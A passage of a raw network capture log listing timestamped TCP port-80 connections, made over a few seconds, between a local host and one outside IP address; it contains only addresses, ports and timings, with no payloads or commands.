                                                        Feb 6, 2023 14:17:30.146362066 CET804985062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.150609970 CET804985062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.150702953 CET4985080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.275679111 CET4985080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.276542902 CET4985180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.338004112 CET804985062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.338092089 CET4985080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.339896917 CET804985162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.340014935 CET4985180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.340440035 CET4985180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.402816057 CET804985162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.406188965 CET804985162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.406291008 CET4985180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.520920038 CET4985180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.521575928 CET4985280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.582170963 CET804985262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.583481073 CET804985162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.583666086 CET4985180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.585099936 CET4985280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.586453915 CET4985280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.647423029 CET804985262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.649900913 CET804985262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.649976969 CET4985280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.804244995 CET4985280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.805274963 CET4985380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.864866972 CET804985262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.866406918 CET804985362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.866575956 CET4985280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.866610050 CET4985380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.867273092 CET4985380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:30.928435087 CET804985362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.931150913 CET804985362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:30.931288004 CET4985380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.042826891 CET4985380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.043700933 CET4985480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.104315042 CET804985362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.104574919 CET804985462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.104753017 CET4985380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.104818106 CET4985480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.105330944 CET4985480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.166461945 CET804985462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.170226097 CET804985462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.170474052 CET4985480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.283341885 CET4985480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.284267902 CET4985580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.344151974 CET804985462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.344747066 CET4985480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.348660946 CET804985562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.348794937 CET4985580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.349236965 CET4985580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.411636114 CET804985562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.414278984 CET804985562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.414482117 CET4985580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.517241955 CET4985580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.518114090 CET4985680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.579499960 CET804985662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.579716921 CET4985680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.580496073 CET804985562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.580588102 CET4985580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.586278915 CET4985680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.647218943 CET804985662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.649513006 CET804985662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.649669886 CET4985680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.752912045 CET4985680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.753869057 CET4985780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.813488960 CET804985662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.813635111 CET4985680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.815473080 CET804985762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.815618992 CET4985780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.816085100 CET4985780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:31.877563000 CET804985762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.880172968 CET804985762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:31.880333900 CET4985780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:32.582681894 CET4985780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:32.624041080 CET4985880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:32.644357920 CET804985762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:32.644480944 CET4985780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:32.685739040 CET804985862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:32.685952902 CET4985880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:32.692574978 CET4985880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:32.754210949 CET804985862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:32.758615971 CET804985862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:32.758788109 CET4985880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:32.904586077 CET4985880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:32.905292988 CET4985980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:32.967176914 CET804985962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:32.967283964 CET804985862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:32.967350006 CET4985980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:32.967386007 CET4985880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:33.007738113 CET4985980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:33.069269896 CET804985962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:33.074064016 CET804985962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:33.074199915 CET4985980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:33.243849993 CET4985980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:33.244801998 CET4986080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:33.305628061 CET804985962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:33.305790901 CET4985980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:33.306320906 CET804986062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:33.306478977 CET4986080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:33.773507118 CET4986080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:33.835035086 CET804986062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:33.837563038 CET804986062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:33.837692022 CET4986080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:33.975332022 CET4986080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:33.976344109 CET4986180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:34.036765099 CET804986162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:34.036808014 CET804986062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:34.037025928 CET4986080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:34.039385080 CET4986180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:34.059958935 CET4986180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:34.120678902 CET804986162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:34.124953985 CET804986162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:34.125149965 CET4986180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:34.283469915 CET4986180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:34.284287930 CET4986280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:34.343983889 CET804986162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:34.344178915 CET4986180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:34.345949888 CET804986262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:34.346142054 CET4986280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:34.385168076 CET4986280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:34.446909904 CET804986262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:34.449311972 CET804986262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:34.449486971 CET4986280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:35.435866117 CET4986280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:35.436533928 CET4986380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:35.498333931 CET804986262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:35.498425961 CET804986362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:35.498588085 CET4986280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:35.501059055 CET4986380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:35.672249079 CET4986380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:35.733597040 CET804986362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:35.737863064 CET804986362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:35.738002062 CET4986380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:35.926279068 CET4986380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:35.927963018 CET4986480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:35.987664938 CET804986362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:35.987786055 CET4986380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:35.988671064 CET804986462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:35.989013910 CET4986480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:35.997425079 CET4986480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.058010101 CET804986462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.062361956 CET804986462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.062721014 CET4986480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.204863071 CET4986480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.205914021 CET4986580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.265374899 CET804986462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.266201973 CET804986562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.266355038 CET4986480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.266436100 CET4986580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.266769886 CET4986580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.326961994 CET804986562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.329330921 CET804986562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.329421997 CET4986580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.439920902 CET4986580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.441215038 CET4986680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.500221014 CET804986562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.500418901 CET4986580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.500523090 CET804986662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.500633955 CET4986680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.501144886 CET4986680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.560633898 CET804986662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.565888882 CET804986662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.566015005 CET4986680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.674463987 CET4986680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.675635099 CET4986780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.733906984 CET804986662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.734173059 CET4986680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.737215042 CET804986762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.737435102 CET4986780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.742778063 CET4986780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.804337978 CET804986762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.806961060 CET804986762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.807141066 CET4986780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.924272060 CET4986780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.924988985 CET4986880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.985801935 CET804986862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.985842943 CET804986762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:36.985961914 CET4986880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.985979080 CET4986780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:36.986361980 CET4986880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.047269106 CET804986862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.051250935 CET804986862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.051429033 CET4986880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.174735069 CET4986880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.177155972 CET4986980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.235573053 CET804986862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.235786915 CET4986880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.238535881 CET804986962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.238724947 CET4986980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.244652033 CET4986980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.306762934 CET804986962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.309365988 CET804986962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.310091972 CET4986980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.424063921 CET4986980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.424829960 CET4987080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.485292912 CET804987062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.485558987 CET4987080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.485727072 CET804986962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.486432076 CET4987080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.486784935 CET4986980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.546725035 CET804987062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.549299002 CET804987062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.549429893 CET4987080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.662098885 CET4987080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.662914038 CET4987180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.722517967 CET804987062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.722640991 CET4987080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.724292040 CET804987162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.724412918 CET4987180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.725069046 CET4987180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.786303997 CET804987162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.788887978 CET804987162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.788976908 CET4987180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.893397093 CET4987180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.894265890 CET4987280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.954822063 CET804987162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.954961061 CET4987180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.956350088 CET804987262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:37.956480980 CET4987280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:37.956882954 CET4987280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.019488096 CET804987262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.021882057 CET804987262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.022067070 CET4987280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.131037951 CET4987280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.133208990 CET4987380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.193406105 CET804987262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.193610907 CET4987280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.194415092 CET804987362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.194735050 CET4987380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.196580887 CET4987380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.257877111 CET804987362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.263432980 CET804987362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.264715910 CET4987380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.378587961 CET4987380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.378849983 CET4987480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.439378023 CET804987462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.439574003 CET4987480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.440023899 CET804987362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.440488100 CET4987480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.441246033 CET4987380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.501008034 CET804987462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.503765106 CET804987462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.503945112 CET4987480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.611597061 CET4987480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.612555027 CET4987580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.672497988 CET804987462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.672624111 CET4987480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.673811913 CET804987562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.674101114 CET4987580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.674669981 CET4987580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.736036062 CET804987562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.739365101 CET804987562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.739470959 CET4987580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.845912933 CET4987580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.846854925 CET4987680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.907526016 CET804987562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.907664061 CET4987580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.908247948 CET804987662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.908848047 CET4987680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.908848047 CET4987680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:38.970312119 CET804987662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.973138094 CET804987662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:38.976697922 CET4987680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.085870981 CET4987780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.087380886 CET4987680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.145535946 CET804987762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.145775080 CET4987780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.148750067 CET804987662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.153316975 CET4987680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.154447079 CET4987780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.213880062 CET804987762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.218770981 CET804987762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.219014883 CET4987780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.335930109 CET4987780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.336935997 CET4987880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.395657063 CET804987762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.395854950 CET4987780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.399672031 CET804987862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.399805069 CET4987880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.400319099 CET4987880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.462934971 CET804987862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.466084957 CET804987862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.466197014 CET4987880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.594415903 CET4987880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.595527887 CET4987980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.656934977 CET804987962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.657018900 CET804987862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.657068014 CET4987980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.657108068 CET4987880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.657687902 CET4987980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.719347954 CET804987962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.721652031 CET804987962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.721752882 CET4987980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.830538988 CET4987980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.831507921 CET4988080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.892136097 CET804987962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.894053936 CET804988062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.894207001 CET4987980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.894253016 CET4988080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.895059109 CET4988080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:39.957335949 CET804988062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.961123943 CET804988062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:39.961312056 CET4988080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.066042900 CET4988080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.066948891 CET4988180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.128463030 CET804988062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.128834963 CET4988080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.129456997 CET804988162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.133589983 CET4988180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.148507118 CET4988180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.211270094 CET804988162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.217240095 CET804988162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.217556953 CET4988180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.331607103 CET4988180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.332525969 CET4988280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.392925024 CET804988262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.393127918 CET4988280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.393564939 CET4988280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.394402027 CET804988162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.394515991 CET4988180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.453855038 CET804988262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.458098888 CET804988262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.458249092 CET4988280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.569741964 CET4988280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.570566893 CET4988380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.630163908 CET804988262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.630304098 CET4988280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.632922888 CET804988362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.633124113 CET4988380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.633558989 CET4988380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.695930004 CET804988362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.700082064 CET804988362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.700222969 CET4988380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.814867973 CET4988380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.815776110 CET4988480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.877576113 CET804988362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.877770901 CET4988380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.878112078 CET804988462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.878257990 CET4988480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.878750086 CET4988480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:40.941219091 CET804988462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.944602966 CET804988462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:40.944813967 CET4988480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:41.050080061 CET4988480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:41.051131010 CET4988580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:41.110577106 CET804988562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:41.110821962 CET4988580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:41.112689972 CET804988462.204.41.4192.168.2.5
